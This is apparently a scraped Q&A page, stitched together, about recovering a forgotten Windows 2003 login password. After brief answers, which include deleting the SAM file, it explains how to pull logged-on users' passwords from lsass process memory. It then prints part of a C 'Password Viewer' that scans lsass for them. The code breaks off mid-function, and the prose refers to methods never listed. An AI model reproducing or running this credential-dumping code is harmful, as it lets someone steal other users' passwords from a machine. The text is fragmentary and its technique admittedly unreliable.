How to recover a Windows 2003 login password

Source: Baidu Wenku  Editor: 高考问答  Time: 2024/04/30 03:36:51
I can't boot from a CD, and I've forgotten the login password!

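There is no way to recover it; you can only reinstall the system! I have already run this experiment myself! We study networking and happened to work with the 2003 system!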

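Mount the hard disk and try deleting the SAM file, though that probably won't work either.
2003 uses stronger encryption, and the algorithm is hard to break.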

There is no way to recover it; you can only reinstall the system!

Go into Safe Mode, choose VGA mode, and give it a try!

Two ways to improve the success rate:

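1. Write the program as a service that periodically checks for local or remote logons (there is really no difference). When it detects a logon, it searches the lsass process memory and tries to obtain the password.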

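2. Have the program simulate a logon (LogonUser() is enough for this). To succeed with the LogonUser() API you must supply an account name and its correct password, and then you can search the lsass process memory. Because we know what the password is, we can locate where it is stored. Since logged-on users' passwords are all stored at the same address or at addresses not far apart, simulating a logon and searching lets you first work out roughly where the passwords of users who log on later will be stored.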

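In any case, of the three methods, the most stable and safest is still the GINA approach. The method that hijacks some winlogon APIs does, after all, modify parts of the system, which puts system stability to the test. As for directly searching the lsass process memory, although it is also difficult, its accuracy and success rate are low.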

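The code below uses a very clumsy and primitive search method. It mainly searches Lsass memory for the string "LocalSystem Remote Procedure", because in quite a lot of tests the password was stored a little after the address containing this string. Of course, many systems do not have this string at all, or even when they do, what we get is a wrong password.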

Code:

//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
// Used Is Pretty Unwise,But This May Be The Only Way To Review The
// Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <windows.h>   // DWORD, BOOL, UINT, MAX_PATH
#include <stdio.h>     // printf
#include <string.h>    // strlen, strnicmp

#define BaseAddress 0x002b5000 // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char Password[MAX_PATH] = {0}; // Store The Found Password

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID);
int Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Function ProtoType Declaration

int main()
{
    DWORD PID = 0;
    printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

    if (!Is2003()) // Check Out If The Box Is 2003
    {
        printf("The Program Can Only Run On Windows 2003 Platform\n");
        return -1;
    }

    PID = GetLsassPID(); // Get The Lsass.exe PID

    if (PID == 0) // Fail To Get PID If Returning Zero
    {
        return -1;
    }

    FindPassword(PID); // Find The Password From Lsass.exe Memory
    return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:
// In: char *Buffer --> The Memory Buffer To Search
// In: const UINT nSize --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
// Since The Password Is Near The Above Location,But It's Not Always True That
// We Will Find The Magic String,Or Even We Find It,The Password May Be Located
// At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
    UINT OffSet = 0;
    UINT i = 0;
    UINT j = 0 ;
    UINT Count = 0;
    if (Buffer == NULL)
    {
        return -1;
    }
    for (i = 0 ; i < nSize ; i++)
    {
        /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
           Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
           The Magic String,We Have To Do It Manually And Slowly
        */
        if (Buffer[i] == 'L')
        {
            OffSet = 0;
            if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
            {
                OffSet += strlen("LocalSystem") + 1;
                if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
                {
                    OffSet += strlen("Remote") + 1;
                    if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
                    {
                        OffSet += strlen("Procedure") + 1;
                        if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
                        {
                            i += OffSet;
                            break;
                        }
                    }
                }
            }
        }
    }